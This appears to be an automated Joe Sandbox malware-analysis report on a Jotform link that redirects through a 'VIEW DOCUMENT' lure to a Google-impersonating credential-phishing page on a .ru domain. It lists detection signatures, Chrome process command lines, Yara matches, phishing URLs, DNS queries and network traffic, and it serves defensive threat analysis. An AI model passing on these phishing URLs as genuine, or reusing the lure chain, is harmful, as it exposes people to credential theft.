Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://form.jotform.com/243186396374063

Overview

General Information

Sample URL:https://form.jotform.com/243186396374063
Analysis ID:1558826
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish44
Yara detected Phisher
AI detected landing page (webpage, office document or email)
HTML body contains password input but no form action
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4912 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://form.jotform.com/243186396374063" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome_proxy.exe (PID: 3368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome_proxy.exe" --profile-directory=Default --app-id=aghbiahbpaijignceidepookljebhfak MD5: 8279104963A0CC9E2AAA593F0D73A36F)
    • chrome.exe (PID: 2064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --source-shortcut="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk" --profile-directory=Default --app-id=aghbiahbpaijignceidepookljebhfak MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2008,i,15956938103317303017,5644695278685977479,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_116JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    dropped/chromecache_129JoeSecurity_Phisher_2Yara detected PhisherJoe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://s6m5.gwckpfsj.ru/MdmjiH0/Joe Sandbox AI: Score: 9 Reasons: The brand 'Google' is well-known and typically associated with the domain 'google.com'., The URL 's6m5.gwckpfsj.ru' does not match the legitimate domain for Google., The domain uses a '.ru' extension, which is unusual for Google and could indicate a phishing attempt., The URL structure appears random and does not resemble any known Google subdomains or services., The presence of multiple input fields labeled as 'u, n, k, n, o, w, n' is suspicious and could be an attempt to collect sensitive information. DOM: 2.5.pages.csv
      Source: Yara matchFile source: dropped/chromecache_116, type: DROPPED
      Source: Yara matchFile source: dropped/chromecache_129, type: DROPPED
      Source: https://form.jotform.com/243186396374063Joe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: '1.0.pages.csv'
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://s6m5.gwckpfsj.ru/MdmjiH0/HTTP Parser: Base64 decoded: https://u0I80KuUoB1iY6zegCwAMjpMstb0jwT7JfjtNa3zVl06tsuF2wys.ndshalox.com/1761285889337624024ZjpLutFjNdSHEQXNOEGFUUDLOVMMVVDUPOUBAIDNHITCHNH
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=2035815460&timestamp=1732045956225
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: /_/bscframe
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=2035815460&timestamp=1732045956225
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: /_/bscframe
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=2035815460&timestamp=1732045956225
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: Iframe src: /_/bscframe
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: <input type="password" .../> found
      Source: https://s6m5.gwckpfsj.ru/MdmjiH0/HTTP Parser: No favicon
      Source: https://s6m5.gwckpfsj.ru/MdmjiH0/HTTP Parser: No favicon
      Source: https://s6m5.gwckpfsj.ru/MdmjiH0/HTTP Parser: No favicon
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No favicon
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No favicon
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No favicon
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No favicon
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="author".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="author".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="author".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="author".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="copyright".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="copyright".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="copyright".. found
      Source: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4BchisRJ0m5J59CZx7JAs5dp43Rr4d&ltmpl=sheets&osid=1&passive=1209600&service=wise&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S85838692%3A1732045951146040&ddm=1HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.242.31.149:443 -> 192.168.2.16:49827 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: global trafficDNS traffic detected: DNS query: form.jotform.com
      Source: global trafficDNS traffic detected: DNS query: cdn01.jotfor.ms
      Source: global trafficDNS traffic detected: DNS query: cdn02.jotfor.ms
      Source: global trafficDNS traffic detected: DNS query: cdn03.jotfor.ms
      Source: global trafficDNS traffic detected: DNS query: cdn.jotfor.ms
      Source: global trafficDNS traffic detected: DNS query: events.jotform.com
      Source: global trafficDNS traffic detected: DNS query: www.jotform.com
      Source: global trafficDNS traffic detected: DNS query: files.jotform.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: api.jotform.com
      Source: global trafficDNS traffic detected: DNS query: submit.jotform.com
      Source: global trafficDNS traffic detected: DNS query: s6m5.gwckpfsj.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: u0i80kuuob1iy6zegcwamjpmstb0jwt7jfjtna3zvl06tsuf2wys.ndshalox.com
      Source: global trafficDNS traffic detected: DNS query: sheets.google.com
      Source: global trafficDNS traffic detected: DNS query: docs.google.com
      Source: global trafficDNS traffic detected: DNS query: accounts.youtube.com
      Source: global trafficDNS traffic detected: DNS query: play.google.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
